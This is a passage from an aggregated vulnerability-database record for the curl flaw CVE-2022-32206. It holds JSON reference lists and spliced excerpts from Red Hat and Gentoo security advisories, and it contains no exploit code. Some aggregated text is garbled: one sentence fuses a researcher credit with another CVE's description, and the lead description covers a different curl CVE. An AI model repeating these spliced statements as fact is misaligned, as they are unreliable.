        "url": "https://access.redhat.com/security/cve/cve-2021-38561"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-40674"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-38561"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22624"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22662"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0308"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35527"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0934"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-0256"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-3709"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22629"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26717"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-24795"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26719"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-2509"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26709"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0256"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26700"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-27405"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25308"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26710"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-1304"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25309"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-27404"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-30699"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-25310"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22628"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0934"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-0308"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-37434"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-3515"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5495-1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html-single/install/index#installing"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25314"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28915"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27782"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1729"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6696"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21123"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32250"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-31150"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28915"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21125"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22576"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-40528"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1729"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25313"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27666"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1012"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27774"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-40528"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29824"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-31151"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6344"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:0408"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30632"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23772"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28131"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29526"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30633"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42898"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23773"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30630"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1962"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30635"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3787"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23806"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1798"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6422"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/multicluster_engine/index#installing-while-connected-online"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-36067"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-38177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28327"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24921"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24675"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:8750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-38178"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-23943"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22721"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26377"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-31813"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42915"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28615"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42916"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22721"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-35252"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-31813"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28614"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28330"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28615"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26377"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:8840"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23943"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32221"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2023-23916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-23916"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:3460"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.10/logging/cluster-logging-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.10/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6183"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-32206"
      },
      {
        "db": "PACKETSTORM",
        "id": "168538"
      },
      {
        "db": "PACKETSTORM",
        "id": "168275"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "168347"
      },
      {
        "db": "PACKETSTORM",
        "id": "170083"
      },
      {
        "db": "PACKETSTORM",
        "id": "170166"
      },
      {
        "db": "PACKETSTORM",
        "id": "172765"
      },
      {
        "db": "PACKETSTORM",
        "id": "168284"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2565"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32206"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2022-32206",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168538",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168275",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170741",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168347",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170083",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "170166",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "172765",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "168284",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2565",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32206",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2022-09-27T16:01:00",
        "db": "PACKETSTORM",
        "id": "168538",
        "ident": null
      },
      {
        "date": "2022-09-07T16:50:50",
        "db": "PACKETSTORM",
        "id": "168275",
        "ident": null
      },
      {
        "date": "2023-01-26T15:29:09",
        "db": "PACKETSTORM",
        "id": "170741",
        "ident": null
      },
      {
        "date": "2022-09-13T15:29:12",
        "db": "PACKETSTORM",
        "id": "168347",
        "ident": null
      },
      {
        "date": "2022-12-02T15:57:08",
        "db": "PACKETSTORM",
        "id": "170083",
        "ident": null
      },
      {
        "date": "2022-12-08T21:28:44",
        "db": "PACKETSTORM",
        "id": "170166",
        "ident": null
      },
      {
        "date": "2023-06-06T17:04:24",
        "db": "PACKETSTORM",
        "id": "172765",
        "ident": null
      },
      {
        "date": "2022-09-07T16:57:47",
        "db": "PACKETSTORM",
        "id": "168284",
        "ident": null
      },
      {
        "date": "2022-06-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202206-2565",
        "ident": null
      },
      {
        "date": "2022-07-07T13:15:08.340000",
        "db": "NVD",
        "id": "CVE-2022-32206",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-06-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202206-2565",
        "ident": null
      },
      {
        "date": "2025-05-05T17:18:13.120000",
        "db": "NVD",
        "id": "CVE-2022-32206",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2565"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "_id": null,
    "data": "curl Resource Management Error Vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2565"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "_id": null,
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2565"
      }
    ],
    "trust": 0.6
  }
}

VAR-202206-1961

Vulnerability from variot - Updated: 2026-04-10 23:24

When curl < 7.84.0 does FTP transfers secured by krb5, it handles message verification failures wrongly. This flaw makes it possible for a Man-In-The-Middle attack to go unnoticed and even allows it to inject data to the client. Harry Sintonen incorrectly handled certain file permissions. An attacker could possibly use this issue to expose sensitive information. This issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: curl security update Advisory ID: RHSA-2022:6159-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:6159 Issue date: 2022-08-24 CVE Names: CVE-2022-32206 CVE-2022-32208 ==================================================================== 1. Summary:

An update for curl is now available for Red Hat Enterprise Linux 8.

Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

Description:

The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.

Security Fix(es):

curl: HTTP compression denial of service (CVE-2022-32206)
curl: FTP-KRB bad message verification (CVE-2022-32208)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification

Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source: curl-7.61.1-22.el8_6.4.src.rpm

aarch64: curl-7.61.1-22.el8_6.4.aarch64.rpm curl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm curl-debugsource-7.61.1-22.el8_6.4.aarch64.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm libcurl-7.61.1-22.el8_6.4.aarch64.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm libcurl-devel-7.61.1-22.el8_6.4.aarch64.rpm libcurl-minimal-7.61.1-22.el8_6.4.aarch64.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.aarch64.rpm

ppc64le: curl-7.61.1-22.el8_6.4.ppc64le.rpm curl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm curl-debugsource-7.61.1-22.el8_6.4.ppc64le.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-devel-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-minimal-7.61.1-22.el8_6.4.ppc64le.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.ppc64le.rpm

s390x: curl-7.61.1-22.el8_6.4.s390x.rpm curl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm curl-debugsource-7.61.1-22.el8_6.4.s390x.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm libcurl-7.61.1-22.el8_6.4.s390x.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.s390x.rpm libcurl-devel-7.61.1-22.el8_6.4.s390x.rpm libcurl-minimal-7.61.1-22.el8_6.4.s390x.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.s390x.rpm

x86_64: curl-7.61.1-22.el8_6.4.x86_64.rpm curl-debuginfo-7.61.1-22.el8_6.4.i686.rpm curl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm curl-debugsource-7.61.1-22.el8_6.4.i686.rpm curl-debugsource-7.61.1-22.el8_6.4.x86_64.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm curl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm libcurl-7.61.1-22.el8_6.4.i686.rpm libcurl-7.61.1-22.el8_6.4.x86_64.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.i686.rpm libcurl-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm libcurl-devel-7.61.1-22.el8_6.4.i686.rpm libcurl-devel-7.61.1-22.el8_6.4.x86_64.rpm libcurl-minimal-7.61.1-22.el8_6.4.i686.rpm libcurl-minimal-7.61.1-22.el8_6.4.x86_64.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.i686.rpm libcurl-minimal-debuginfo-7.61.1-22.el8_6.4.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2022-32206 https://access.redhat.com/security/cve/CVE-2022-32208 https://access.redhat.com/security/updates/classification/#moderate

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYwa9b9zjgjWX9erEAQi1rQ/+Kw4R4cPAIlGUx4vJwSMw8zwCDxnLviV+ YgCpaCuUwCkWI9hrAQNC1O5i2MSl7j8jI9dt0Oe770VwNIZPzJMK8MX96zYdeOsg EiuwTW5KTWKwCeAvPt6ydVji9R0N7FMDBxmdi1aE8gBt8J6pIwp4ozrR4jXiXCjB dQJlc2kf7YXDiengte1jpXNCFh2ar9t8lqmW53Hu05zR8VFdAPk6NM1kTIploICN blR9t80TbWouBvN2A6gIZ0ZWnbJOY9odCBHdo5ay8kufmQC0K9QKb7jyoaUUHVau 5/HVbncd7bFQuyu+yGoOxU1TCxwee3B9LAmR4uzDdJcaTxPgvK2cyskdTVz+9N9k nJLDYGaL7UNC7YkbByN58VC6fdGsnn8QIXHg7ICTgdhYiPZ3uP5JUiDrAGKKb/v+ XPtwYHuh6yX0OfS0JqFEMjR0P1rFLiuDNBOPBDiTV2mBVd+7kiNTs1izUDGwQeFd VaNNNU4kpD3FGOgRwxIAKz2qCX+Ody8goBeJJPGcVlmDp025ZrMisl1QC8/3eTas ML+TSvTeaSY/I35uPzKsoh1f+/lAwUsB54I6NxHH3vWYryievuSdpjtNsQInACjw owX+pU5CfOwdD56Hqdhb7fjuJVufo6VC8b0zy/vSZYnNt0cfojXA73F3B1K5+XcF bBkTeh+fqsg=powM -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:

Red Hat Advanced Cluster Management for Kubernetes 2.3.12 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/

Security fix:

CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS

Bug fixes:

Remove 1.9.1 from Proxy Patch Documentation (BZ# 2076856)
RHACM 2.3.12 images (BZ# 2101411)
Bugs fixed (https://bugzilla.redhat.com/):

2076856 - [doc] Remove 1.9.1 from Proxy Patch Documentation 2101411 - RHACM 2.3.12 images 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS

Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.12.0 images:

Security Fix(es):

golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)
golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
golang: syscall: faccessat checks wrong group (CVE-2022-29526)
golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

RHEL-8-CNV-4.12

Bugs fixed (https://bugzilla.redhat.com/):

Gentoo Linux Security Advisory GLSA 202212-01

                                       https://security.gentoo.org/

Severity: High Title: curl: Multiple Vulnerabilities Date: December 19, 2022 Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365 ID: 202212-01

Synopsis

Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.

Background

A command line tool and library for transferring data with URLs.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/curl < 7.86.0 >= 7.86.0

Description

Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.

Impact

Please review the referenced CVE identifiers for details.

Workaround

There is no known workaround at this time.

Resolution

All curl users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"

References

[ 1 ] CVE-2021-22922 https://nvd.nist.gov/vuln/detail/CVE-2021-22922 [ 2 ] CVE-2021-22923 https://nvd.nist.gov/vuln/detail/CVE-2021-22923 [ 3 ] CVE-2021-22925 https://nvd.nist.gov/vuln/detail/CVE-2021-22925 [ 4 ] CVE-2021-22926 https://nvd.nist.gov/vuln/detail/CVE-2021-22926 [ 5 ] CVE-2021-22945 https://nvd.nist.gov/vuln/detail/CVE-2021-22945 [ 6 ] CVE-2021-22946 https://nvd.nist.gov/vuln/detail/CVE-2021-22946 [ 7 ] CVE-2021-22947 https://nvd.nist.gov/vuln/detail/CVE-2021-22947 [ 8 ] CVE-2022-22576 https://nvd.nist.gov/vuln/detail/CVE-2022-22576 [ 9 ] CVE-2022-27774 https://nvd.nist.gov/vuln/detail/CVE-2022-27774 [ 10 ] CVE-2022-27775 https://nvd.nist.gov/vuln/detail/CVE-2022-27775 [ 11 ] CVE-2022-27776 https://nvd.nist.gov/vuln/detail/CVE-2022-27776 [ 12 ] CVE-2022-27779 https://nvd.nist.gov/vuln/detail/CVE-2022-27779 [ 13 ] CVE-2022-27780 https://nvd.nist.gov/vuln/detail/CVE-2022-27780 [ 14 ] CVE-2022-27781 https://nvd.nist.gov/vuln/detail/CVE-2022-27781 [ 15 ] CVE-2022-27782 https://nvd.nist.gov/vuln/detail/CVE-2022-27782 [ 16 ] CVE-2022-30115 https://nvd.nist.gov/vuln/detail/CVE-2022-30115 [ 17 ] CVE-2022-32205 https://nvd.nist.gov/vuln/detail/CVE-2022-32205 [ 18 ] CVE-2022-32206 https://nvd.nist.gov/vuln/detail/CVE-2022-32206 [ 19 ] CVE-2022-32207 https://nvd.nist.gov/vuln/detail/CVE-2022-32207 [ 20 ] CVE-2022-32208 https://nvd.nist.gov/vuln/detail/CVE-2022-32208 [ 21 ] CVE-2022-32221 https://nvd.nist.gov/vuln/detail/CVE-2022-32221 [ 22 ] CVE-2022-35252 https://nvd.nist.gov/vuln/detail/CVE-2022-35252 [ 23 ] CVE-2022-35260 https://nvd.nist.gov/vuln/detail/CVE-2022-35260 [ 24 ] CVE-2022-42915 https://nvd.nist.gov/vuln/detail/CVE-2022-42915 [ 25 ] CVE-2022-42916 https://nvd.nist.gov/vuln/detail/CVE-2022-42916

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202212-01

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . Bugs fixed (https://bugzilla.redhat.com/):

2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/

Security fixes:

moment: inefficient parsing algorithim resulting in DoS (CVE-2022-31129)
vm2: Sandbox Escape in vm2 (CVE-2022-36067)

Bug fixes:

Submariner Globalnet e2e tests failed on MTU between On-Prem to Public clusters (BZ# 2074547)
OCP 4.11 - Install fails because of: pods "management-ingress-63029-5cf6789dd6-" is forbidden: unable to validate against any security context constrain (BZ# 2082254)
subctl gather fails to gather libreswan data if CableDriver field is missing/empty in Submariner Spec (BZ# 2083659)
Yaml editor for creating vSphere cluster moves to next line after typing (BZ# 2086883)
Submariner addon status doesn't track all deployment failures (BZ# 2090311)
Unable to deploy Hypershift operator on MCE hub using ManagedClusterAddOn without including s3 secret (BZ# 2091170)
After switching to ACM 2.5 the managed clusters log "unable to create ClusterClaim" errors (BZ# 2095481)
Enforce failed and report the violation after modified memory value in limitrange policy (BZ# 2100036)
Creating an application fails with "This application has no subscription match selector (spec.selector.matchExpressions)" (BZ# 2101577)
Inconsistent cluster resource statuses between "All Subscription" topology and individual topologies (BZ# 2102273)
managed cluster is in "unknown" state for 120 mins after OADP restore
RHACM 2.5.2 images (BZ# 2104553)
Subscription UI does not allow binding to label with empty value (BZ# 2104961)
Upgrade to 2.5.1 from 2.5.0 fails due to missing Subscription CRD (BZ# 2106069)
Region information is not available for Azure cloud in managedcluster CR (BZ# 2107134)
cluster uninstall log points to incorrect container name (BZ# 2107359)
